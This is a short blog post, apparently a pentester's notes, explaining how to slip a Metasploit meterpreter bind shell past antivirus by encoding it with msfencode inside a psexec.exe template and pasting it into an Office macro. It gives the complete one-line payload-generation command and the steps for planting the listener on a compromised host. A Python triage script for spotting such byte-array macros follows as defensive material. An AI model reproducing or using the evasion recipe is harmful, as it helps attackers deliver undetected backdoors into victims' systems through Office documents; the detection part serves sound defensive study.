My own personal time capsule.

Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (the -x option) to wrap the payload. This can be done in a few simple steps:

1) Generate the payload
2) Pipe it to msfencode with the -x option (use e.g. psexec.exe as the template)
3) Use shellcode2vbs.py to create a VBS script containing the binary representation of the code
4) Paste the output into a macro in Word, Excel or anything else from the Office suite
5) Run the “ShellcodeExecute” macro from inside Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste the content of ‘BIND_4999.vbs’ into an MS Word document as a macro. Now upload it to create a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted, e.g. by a firewall or because it sits in a DMZ.
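From the defender's side, the artefact this procedure leaves behind is distinctive: a macro whose body is dominated by a long array of byte literals (the output of the shellcode-to-VBS conversion) plus a procedure with a telling name. The following triage script is an added example, not part of the original post or of any Metasploit tool; it assumes macro source already extracted to text (e.g. by an OLE/macro dump tool) and uses a constructed benign macro and a constructed macro whose byte array is filler, not real shellcode. The function names `analyze_macro` and `longest_literal_run`, the threshold value and the `SUSPICIOUS_NAMES` list are my own choices.

```python
import re

# Constructed sample macro text (not from the page): an ordinary document macro.
BENIGN_MACRO = """
Sub AutoOpen()
    MsgBox "Quarterly report loaded"
End Sub
"""

# Constructed sample (not real shellcode): 300 filler byte literals laid out the
# way a shellcode-to-VBS converter typically emits them, inside a procedure
# carrying the macro name used in the post.
SUSPICIOUS_MACRO = (
    "Sub ShellcodeExecute()\n"
    "    Dim buf As Variant\n"
    "    buf = Array(" + ", ".join(f"&H{(i * 37) % 256:02X}" for i in range(300)) + ")\n"
    "End Sub\n"
)

# VBA/VBS ways of spelling a raw byte: &H hex literals and Chr(n) calls.
HEX_LITERAL = re.compile(r"&H[0-9A-Fa-f]{1,2}\b")
CHR_LITERAL = re.compile(r"\bChr\s*\(\s*\d{1,3}\s*\)", re.IGNORECASE)
BYTE_LITERAL = re.compile(r"(?:&H[0-9A-Fa-f]{1,2}\b|\bChr\s*\(\s*\d{1,3}\s*\))", re.IGNORECASE)

# Procedure names that warrant a look regardless of the byte count (assumed list).
SUSPICIOUS_NAMES = ("ShellcodeExecute",)


def longest_literal_run(text):
    """Length of the longest sequence of byte literals separated only by
    commas, ampersands and whitespace. Encoded payload stubs are emitted as one
    contiguous block, so a long run is a stronger signal than a raw count."""
    best = current = 0
    last_end = None
    for m in BYTE_LITERAL.finditer(text):
        between = text[last_end:m.start()] if last_end is not None else ""
        # Only commas, '&' concatenation, '_' line continuations and whitespace
        # may sit between two literals of the same run.
        if last_end is not None and re.fullmatch(r"[\s,&_]*", between):
            current += 1
        else:
            current = 1
        best = max(best, current)
        last_end = m.end()
    return best


def analyze_macro(text, run_threshold=64):
    """Heuristic triage of extracted macro source. Returns counts, matched
    names and a verdict; tune run_threshold to the false-positive rate you can
    tolerate, since legitimate macros rarely embed more than a handful of
    byte literals in a row."""
    hex_count = len(HEX_LITERAL.findall(text))
    chr_count = len(CHR_LITERAL.findall(text))
    run = longest_literal_run(text)
    lowered = text.lower()
    names = [n for n in SUSPICIOUS_NAMES if n.lower() in lowered]

    reasons = []
    if run >= run_threshold:
        reasons.append(f"contiguous run of {run} byte literals (>= {run_threshold})")
    if names:
        reasons.append("suspicious procedure name(s): " + ", ".join(names))

    return {
        "byte_literals": hex_count + chr_count,
        "longest_run": run,
        "names": names,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("suspicious", SUSPICIOUS_MACRO)):
        print(label, analyze_macro(src))
```

The script only sees what the conversion step leaves in cleartext; a macro that splits or re-encodes the array before use will lower the literal count, so treat a hit as a reason to pull the file for sandboxing rather than as proof, and pair it with policy controls such as blocking macros from documents that arrive from the internet.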